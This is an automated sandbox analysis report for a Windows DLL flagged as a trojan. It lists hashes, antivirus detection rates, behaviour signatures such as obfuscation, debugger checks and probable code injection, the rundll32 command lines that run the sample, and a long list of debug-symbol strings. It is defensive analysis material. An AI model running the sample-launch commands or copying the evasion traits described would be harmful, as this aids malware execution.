Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Trojan.Agent.FHBA.20741.16185

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.Agent.FHBA.20741.16185 (renamed file extension from 16185 to dll)
Analysis ID:483798
MD5:4b59be3cef04547514828f8c6443ae20
SHA1:bed0d3a622ca55a914ceaf885ebc2fb419e8a9eb
SHA256:b7ca395f51df95bd3d5b5b4a30a5c2381a9893f0d66aff011d605319d5c0ea7d
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Uses 32bit PE files
One or more processes crash
Contains functionality to read the PEB
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3668 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 5444 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 2564 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 5440 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 812 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 1752 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll,uvlcopdlxoed MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 804 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 2036 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',uvlcopdlxoed MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2600 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 804 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dllAvira: detected
Multi AV Scanner detection for submitted fileShow sources
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dllVirustotal: Detection: 62%Perma Link
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dllMetadefender: Detection: 29%Perma Link
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dllReversingLabs: Detection: 75%
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, RELOCS_STRIPPED
Source: Binary string: msacm32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: msvfw32.pdbL source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: msvfw32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb7 source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.250625291.00000000052FD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.250652039.0000000000C54000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.260648787.0000000004C2B000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdbCa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: avicap32.pdbF source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.251728422.0000000000C4E000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.263422997.0000000000B8E000.00000004.00000001.sdmp
Source: Binary string: userenv.pdb/ source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: winmm.pdbpt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: msacm32.pdb% source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdbht source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: mscms.pdbT source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb8 source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdbXt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.250660218.0000000000C5A000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.262553693.0000000000B9A000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb- source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: rtutils.pdb8 source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: ODBC32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: rtutils.pdbbt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb[ source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdbQa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbua source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdbb source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: winmm.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: avifil32.pdb8t6 source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb> source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: mpr.pdbZ source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: rtm.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: sfc.pdbY source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdbY source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdbu source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.251452448.0000000003516000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.250652039.0000000000C54000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.260239602.0000000000B94000.00000004.00000001.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb$t: source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: dpapi.pdbnt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb" source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: avifil32.pdb@ source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: ColorAdapterClient.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdby source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb' source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb5 source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb|t source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: avifil32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbIa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb; source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbk source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.251871969.0000000003510000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.251728422.0000000000C4E000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.263422997.0000000000B8E000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: WINMMBASE.pdby source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb]a source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb2t( source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: winmm.pdbm source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdb! source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: combase.pdbWa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb4 source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdbZ source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: userenv.pdbvt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbe source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: mscms.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: avicap32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.251566449.000000000351C000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.250660218.0000000000C5A000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.262553693.0000000000B9A000.00000004.00000001.sdmp
Source: Binary string: ODBC32.pdbOa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
